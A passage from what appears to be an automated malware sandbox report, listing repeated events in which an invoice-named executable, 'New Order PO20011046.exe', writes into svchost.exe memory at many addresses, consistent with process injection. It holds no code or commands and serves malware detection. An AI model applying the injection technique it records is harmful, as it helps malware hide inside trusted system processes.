                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5230000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5240000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5250000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5260000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5270000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5390000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 53A0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 53B0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 53C0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 53D0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 53E0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 53F0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5400000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5410000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5420000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5570000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5580000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5590000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 55A0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 55B0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 55C0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 55D0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 55E0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 55F0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5600000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5610000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5620000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5630000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5640000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5650000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5660000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5670000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5680000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5690000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 56A0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 56B0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 56C0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 56D0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 56E0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 56F0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5700000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5710000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5860000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5870000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5880000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5890000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 58A0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 58B0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 58C0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 58D0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 58E0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 58F0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5900000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5910000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5920000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5930000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5940000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5950000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5960000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5970000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5980000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5990000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 59A0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 59B0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 59C0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 59D0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 59E0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 59F0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5A00000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5A10000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5A20000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5A30000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5A40000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5A50000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5A60000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5A70000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5A80000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5A90000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5AA0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5AB0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5AC0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5AD0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5AE0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5AF0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5B00000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5B10000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5B20000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5B30000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5B40000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5B50000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5B60000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5B70000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5B80000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5B90000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5BA0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5BB0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5BC0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5BD0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5BE0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5BF0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5C00000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5C10000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5C20000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5C30000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5C40000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5C50000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5C60000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5C70000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5C80000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5C90000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5CA0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5CB0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5CC0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5CD0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5CE0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5CF0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5D00000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5D10000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5D20000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5D30000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5D40000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5D50000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5D60000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5D70000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5D80000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5D90000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5DA0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5DB0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5DC0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5DD0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5DE0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5DF0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5E00000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5E10000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5E20000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5E30000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5E40000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5E50000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5E60000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5E70000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5E80000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5E90000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5EA0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5EB0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5EC0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5ED0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5EE0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5EF0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5F00000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5F10000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5F20000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5F30000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5F40000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5F50000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5F60000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5F70000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5F80000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5F90000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5FA0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5FB0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5FC0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5FD0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5FE0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5FF0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6000000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6010000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6020000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6030000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6040000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6050000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6060000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6070000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6080000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6090000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 60A0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 60B0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 60C0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 60D0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 60E0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 60F0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6100000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6110000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6120000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6130000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6140000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6150000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6160000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6170000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6180000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6190000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 61A0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 61B0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 61C0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 61D0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 61E0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 61F0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6200000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6350000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6360000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6370000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6380000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6390000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 63A0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 63B0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 63C0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 63D0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 63E0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 63F0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6400000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6410000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6420000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6430000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6440000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6450000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6460000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6470000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6480000Jump to behavior
